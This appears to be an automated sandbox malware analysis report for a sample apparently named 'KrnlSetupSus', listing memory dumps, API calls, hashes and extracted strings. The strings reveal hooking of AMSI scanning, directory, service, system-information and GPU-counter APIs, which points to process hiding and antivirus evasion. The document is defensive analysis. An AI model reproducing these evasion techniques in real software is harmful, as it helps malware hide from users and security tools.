                                                                                                                                   • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                  • Opcode ID: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
                                                                                                                                  • Instruction ID: 0285f5810413c0bcb4f0cf3e41e0ac184aea23e29723bb599320d6d960dcbe8d
                                                                                                                                  • Opcode Fuzzy Hash: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
                                                                                                                                  • Instruction Fuzzy Hash: 54311A76215F80CAEB608F61E8807EE7365F784748F84442ADB4E47B58EF78D688C714
                                                                                                                                  APIs
                                                                                                                                  • RtlCaptureContext.NTDLL ref: 1C56CBCB
                                                                                                                                  • RtlLookupFunctionEntry.NTDLL ref: 1C56CBE3
                                                                                                                                  • RtlVirtualUnwind.NTDLL ref: 1C56CC1E
                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 1C56CC57
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 1C56CC61
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32 ref: 1C56CC6C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                   • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                  • Opcode ID: e8873b674f2e359e5f96541e43b59108724062fc4a870e8b19e24c4a97edadbc
                                                                                                                                  • Instruction ID: 9a84a5b0ee47d38dbc912028d0fe80f26c9897d739e5381727bb0f66767fd3d9
                                                                                                                                  • Opcode Fuzzy Hash: e8873b674f2e359e5f96541e43b59108724062fc4a870e8b19e24c4a97edadbc
                                                                                                                                  • Instruction Fuzzy Hash: AB416C36614F8086EB60CF35E8407EE73A5F788798F900225EA9D47B68DF38C199CB10
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                   • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1164774033-0
                                                                                                                                  • Opcode ID: de3a4f1c4722aca2eb904f336336930601643f7c9dfe6b9c18223e648004d9fa
                                                                                                                                  • Instruction ID: 16f32f009cd4c9d182f8157d95b2f7ec034630380a4ac3ad8bbcc7c84e17be29
                                                                                                                                  • Opcode Fuzzy Hash: de3a4f1c4722aca2eb904f336336930601643f7c9dfe6b9c18223e648004d9fa
                                                                                                                                  • Instruction Fuzzy Hash: 89912A327087E189EB10CB76E8843AE7B61E781BA8F544915DE9927F58DE38C0C6C716
                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32 ref: 1C567E7C
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1C567E8A
                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 1C567E96
                                                                                                                                  • QueryPerformanceCounter.KERNEL32 ref: 1C567EA6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                   • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                  • Opcode ID: f835b8e08e75b66adb0c80a9203c172f2f025c961cbdb54561531f30ab1cb5f4
                                                                                                                                  • Instruction ID: aa9fa997e83ad2c83d7e44df07439b664d8b46dc13157c73e3ca57d35dea4757
                                                                                                                                  • Opcode Fuzzy Hash: f835b8e08e75b66adb0c80a9203c172f2f025c961cbdb54561531f30ab1cb5f4
                                                                                                                                  • Instruction Fuzzy Hash: A2115B32751F418AFB00CF61E8557E833A4F759758F840E21EA6D86BA4DF78D1D88340
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 1C56CFE0: HeapAlloc.KERNEL32(?,?,00000000,1C56C747), ref: 1C56D035
                                                                                                                                    • Part of subcall function 1C570C78: _invalid_parameter_noinfo.LIBCMT ref: 1C570CAB
                                                                                                                                  • FindFirstFileExW.KERNEL32 ref: 1C56D959
                                                                                                                                    • Part of subcall function 1C56D060: HeapFree.KERNEL32(?,?,?,?,?,?,?,1C56650A), ref: 1C56D076
                                                                                                                                    • Part of subcall function 1C56D060: GetLastError.KERNEL32(?,?,?,?,?,?,?,1C56650A), ref: 1C56D080
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                   • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2436724071-0
                                                                                                                                  • Opcode ID: b49c723bd621bb268e7285a2a685c523d1053a6ec233f158c25b1caceae8abcd
                                                                                                                                  • Instruction ID: d61593b68042bb433fca05a784bca0021e4c800542f7c5cba0401ed33d17c777
                                                                                                                                  • Opcode Fuzzy Hash: b49c723bd621bb268e7285a2a685c523d1053a6ec233f158c25b1caceae8abcd
                                                                                                                                  • Instruction Fuzzy Hash: B3810036704BA086EB20CF32E84069AB7A1E785BE4F548A25DFAD47F54DE38D0C6C715
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 519bdcbf609bc7ec004aea068cc5bde008b16564e613e135f309c4d7e7264ee4
                                                                                                                                  • Instruction ID: e7b6f03177ea942dbfdd4a2e41196afb0ca2b6c5dc9ad336281578e80708054b
                                                                                                                                  • Opcode Fuzzy Hash: 519bdcbf609bc7ec004aea068cc5bde008b16564e613e135f309c4d7e7264ee4
                                                                                                                                  • Instruction Fuzzy Hash: F3612567A0E66586D7127BBCF4011EA7F28EF45375B0441B7EA8ECA097CD08249A83F1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: eed59b40fb44a015fd89753d44b84933eca5a0542eb286ab4f7625b66429afb0
                                                                                                                                  • Instruction ID: b63ecda1bfbf26d32813d18f88c87f0ad88212914fa7a9db1e64b11f1aa0fa27
                                                                                                                                  • Opcode Fuzzy Hash: eed59b40fb44a015fd89753d44b84933eca5a0542eb286ab4f7625b66429afb0
                                                                                                                                  • Instruction Fuzzy Hash: 6501D6B16556818AF75A8F2AD81276A3791F3043D4F80812CD449C7A52DB3DD0E08F04
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 1C561E43
                                                                                                                                    • Part of subcall function 1C5621BC: GetModuleHandleA.KERNEL32(?,?,?,1C561E75), ref: 1C5621D4
                                                                                                                                    • Part of subcall function 1C5621BC: GetProcAddress.KERNEL32(?,?,?,1C561E75), ref: 1C5621E5
                                                                                                                                    • Part of subcall function 1C566030: GetCurrentThreadId.KERNEL32 ref: 1C56606B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                                                                                  • API String ID: 4175298099-4225371247
                                                                                                                                  • Opcode ID: 6191e1ab36bf222c83b8ad8c498c744b26cf75ee4eb45f907204208c319144d1
                                                                                                                                  • Instruction ID: d9a87f4586596df3d62a08b319bed76a6ac1b229481c186192ff9c625aee8052
                                                                                                                                  • Opcode Fuzzy Hash: 6191e1ab36bf222c83b8ad8c498c744b26cf75ee4eb45f907204208c319144d1
                                                                                                                                  • Instruction Fuzzy Hash: 36416EB4294E6AE0FB04DBAAED50FD53326A7A1785FC04417C50952574EE78F2CEC3A4
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 2005889112-2564639436
                                                                                                                                  • Opcode ID: a54fc127e61d0168aa516e5340f5f1e347c27459d257a44bc878666ad7d983e8
                                                                                                                                  • Instruction ID: eec5c0d97bab18bcad0c06ab83897716d02d906bfd42ee39b507c7975de044fc
                                                                                                                                  • Opcode Fuzzy Hash: a54fc127e61d0168aa516e5340f5f1e347c27459d257a44bc878666ad7d983e8
                                                                                                                                  • Instruction Fuzzy Hash: 67514132614BD486E714CF62E45879A77A2F788F99F944124DE8A47B18EF3CD099C740
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000100,00000000,1C56F10A,?,?,00000000,1C56F08D), ref: 1C56EDB5
                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,1C56F08D), ref: 1C56EDC7
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,1C56F08D), ref: 1C56EE09
                                                                                                                                  • VirtualProtect.KERNEL32 ref: 1C56EE65
                                                                                                                                  • VirtualProtect.KERNEL32 ref: 1C56EE96
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,1C56F08D), ref: 1C56EEDA
                                                                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,1C56F08D), ref: 1C56EEE6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                                                                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                                                                                  • API String ID: 740688525-1880043860
                                                                                                                                  • Opcode ID: 89f5c5e66e1b755f5237e9f7541e1364ddeb157113d91c30ac669978387284b4
                                                                                                                                  • Instruction ID: ff031242910935018dd5ef38613a9afc6f28ea52ca0731e768deae39750b1585
                                                                                                                                  • Opcode Fuzzy Hash: 89f5c5e66e1b755f5237e9f7541e1364ddeb157113d91c30ac669978387284b4
                                                                                                                                  • Instruction Fuzzy Hash: 0241DF31702B6492EB159B67A8007997361BB88BB0F980725DE3E47BC0EF78E485C760
                                                                                                                                  APIs
                                                                                                                                  • PdhGetCounterInfoW.PDH ref: 1C5631CD
                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 1C5631E2
                                                                                                                                  • HeapAlloc.KERNEL32 ref: 1C5631F0
                                                                                                                                  • PdhGetCounterInfoW.PDH ref: 1C563206
                                                                                                                                  • StrCmpW.SHLWAPI ref: 1C56321B
                                                                                                                                    • Part of subcall function 1C563720: StrCmpNW.SHLWAPI ref: 1C563742
                                                                                                                                    • Part of subcall function 1C563720: StrStrW.SHLWAPI ref: 1C563760
                                                                                                                                    • Part of subcall function 1C563720: StrToIntW.SHLWAPI ref: 1C563787
                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 1C563258
                                                                                                                                  • HeapFree.KERNEL32 ref: 1C563266
                                                                                                                                  Strings
                                                                                                                                  • \GPU Engine(*)\Running Time, xrefs: 1C563214
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                                                                                  • String ID: \GPU Engine(*)\Running Time
                                                                                                                                  • API String ID: 1943346504-1805530042
                                                                                                                                  • Opcode ID: 1e0206962784cbb59066502de87d8a89b87f36d7e7391f794394394ba1b10176
                                                                                                                                  • Instruction ID: c0be9722f4cf7cb99709bab27778db6345b5de039ea356ad617c40163115e2b1
                                                                                                                                  • Opcode Fuzzy Hash: 1e0206962784cbb59066502de87d8a89b87f36d7e7391f794394394ba1b10176
                                                                                                                                  • Instruction Fuzzy Hash: 49219132A04FA197F710DF52E80478AB3A1FB88F99FD44225DE4947E25DF38E1968750
                                                                                                                                  APIs
                                                                                                                                  • PdhGetCounterInfoW.PDH ref: 1C5632E6
                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 1C5632F7
                                                                                                                                  • HeapAlloc.KERNEL32 ref: 1C563305
                                                                                                                                  • PdhGetCounterInfoW.PDH ref: 1C56331B
                                                                                                                                  • StrCmpW.SHLWAPI ref: 1C563330
                                                                                                                                    • Part of subcall function 1C563720: StrCmpNW.SHLWAPI ref: 1C563742
                                                                                                                                    • Part of subcall function 1C563720: StrStrW.SHLWAPI ref: 1C563760
                                                                                                                                    • Part of subcall function 1C563720: StrToIntW.SHLWAPI ref: 1C563787
                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 1C56335D
                                                                                                                                  • HeapFree.KERNEL32 ref: 1C56336B
                                                                                                                                  Strings
                                                                                                                                  • \GPU Engine(*)\Utilization Percentage, xrefs: 1C563329
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                                                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                                                                                                  • API String ID: 1943346504-3507739905
                                                                                                                                  • Opcode ID: 9639e886c49eaef89c86f9b1444dfaf1491e17b7a6c502a98820b8b399e89069
                                                                                                                                  • Instruction ID: 794c3d9f9570d19cd2769c6a7808571e7b3a76e7e091dad488167c0b5a9c4803
                                                                                                                                  • Opcode Fuzzy Hash: 9639e886c49eaef89c86f9b1444dfaf1491e17b7a6c502a98820b8b399e89069
                                                                                                                                  • Instruction Fuzzy Hash: 59217C36B10F9186E700CF63E844B8A73A1FB84F99F944125DE8A43B25EF38E096C710
                                                                                                                                  APIs
                                                                                                                                  • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 1C56A049
                                                                                                                                    • Part of subcall function 1C56AF04: __GetUnwindTryBlock.LIBCMT ref: 1C56AF47
                                                                                                                                    • Part of subcall function 1C56AF04: __SetUnwindTryBlock.LIBVCRUNTIME ref: 1C56AF6C
                                                                                                                                  • Is_bad_exception_allowed.LIBVCRUNTIME ref: 1C56A121
                                                                                                                                  • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 1C56A36F
                                                                                                                                  • std::bad_alloc::bad_alloc.LIBCMT ref: 1C56A47C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449

APIs
Strings
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436

APIs
• __scrt_dllmain_crt_thread_attach.LIBCMT ref: 1C567A38
• __scrt_acquire_startup_lock.LIBCMT ref: 1C567A8A
• _RTC_Initialize.LIBCMT ref: 1C567AB8
• __scrt_dllmain_after_initialize_c.LIBCMT ref: 1C567ADE
• __scrt_release_startup_lock.LIBCMT ref: 1C567B09
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0

APIs
• LoadLibraryExW.KERNEL32(?,?,?,1C569A2B,?,?,?,1C56921C,?,?,?,?,1C568D25), ref: 1C5698F1
• GetLastError.KERNEL32(?,?,?,1C569A2B,?,?,?,1C56921C,?,?,?,?,1C568D25), ref: 1C5698FF
• LoadLibraryExW.KERNEL32(?,?,?,1C569A2B,?,?,?,1C56921C,?,?,?,?,1C568D25), ref: 1C569929
• FreeLibrary.KERNEL32(?,?,?,1C569A2B,?,?,?,1C56921C,?,?,?,?,1C568D25), ref: 1C569997
• GetProcAddress.KERNEL32(?,?,?,1C569A2B,?,?,?,1C56921C,?,?,?,?,1C568D25), ref: 1C5699A3
Strings
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818

APIs
Strings
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586

APIs
• GetLastError.KERNEL32 ref: 1C56C70F
• SetLastError.KERNEL32 ref: 1C56C72E
• FlsSetValue.KERNEL32 ref: 1C56C757
• FlsSetValue.KERNEL32 ref: 1C56C768
• FlsSetValue.KERNEL32 ref: 1C56C779
  • Part of subcall function 1C56D060: HeapFree.KERNEL32(?,?,?,?,?,?,?,1C56650A), ref: 1C56D076
  • Part of subcall function 1C56D060: GetLastError.KERNEL32(?,?,?,?,?,?,?,1C56650A), ref: 1C56D080
• SetLastError.KERNEL32 ref: 1C56C79C
Similarity
• API ID: ErrorLast$Value$FreeHeap
• String ID:
• API String ID: 365477584-0

APIs
Similarity
• API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
• String ID:
• API String ID: 4193868204-0

APIs
• GetModuleHandleW.KERNEL32(?,?,?,?,?,1C56387C), ref: 1C563C00
• GetCurrentProcess.KERNEL32(?,?,?,?,?,1C56387C), ref: 1C563C0E
• VirtualProtectEx.KERNEL32(?,?,?,?,?,1C56387C), ref: 1C563C30
• GetCurrentProcess.KERNEL32(?,?,?,?,?,1C56387C), ref: 1C563C4E
• VirtualProtectEx.KERNEL32(?,?,?,?,?,1C56387C), ref: 1C563C6F
• TerminateThread.KERNEL32(?,?,?,?,?,1C56387C), ref: 1C563C7E
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0
                                                                                                                                  • Opcode ID: cb96bd636d75ef0150aa004f7367dade5eb8c58e0f15bd5ff47d86791bf19fa4
                                                                                                                                  • Instruction ID: 11a5d36b373982123a5e76364d13748cebfb1d2f8d31dd36bd8388f88e47846d
                                                                                                                                  • Opcode Fuzzy Hash: cb96bd636d75ef0150aa004f7367dade5eb8c58e0f15bd5ff47d86791bf19fa4
                                                                                                                                  • Instruction Fuzzy Hash: F4014C75641B8082FB209B62E84CB9A73A2BF59B89F840028CE4E06764EF3DD0D8C710
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                   • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CombinePath
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3422762182-91387939
                                                                                                                                  • Opcode ID: 546a660c3a3c5793cfedcc045940b0098f6ff5b56a36a36c93076b4998a23383
                                                                                                                                  • Instruction ID: 53253a9431956a60421cf7449046c09963ade99d4db046d7171fa7bae2eb1e12
